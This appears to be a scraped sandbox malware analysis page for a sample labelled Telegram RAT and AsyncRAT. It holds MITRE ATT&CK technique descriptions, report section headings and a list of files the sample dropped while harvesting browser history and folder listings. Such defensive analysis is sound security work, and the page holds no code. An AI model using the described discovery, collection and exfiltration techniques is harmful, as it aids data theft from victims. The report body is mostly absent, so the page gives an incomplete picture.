Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report FUEvp5c8lO.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: AsyncRAT

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Browsers\Firefox\Bookmarks.txt

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Browsers\Firefox\History.txt

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Directories\Desktop.txt

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Directories\Documents.txt

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Directories\Downloads.txt

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Directories\OneDrive.txt

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Directories\Pictures.txt

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Directories\Startup.txt

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Directories\Temp.txt

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Directories\Videos.txt

Windows Analysis Report
FUEvp5c8lO.exe

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre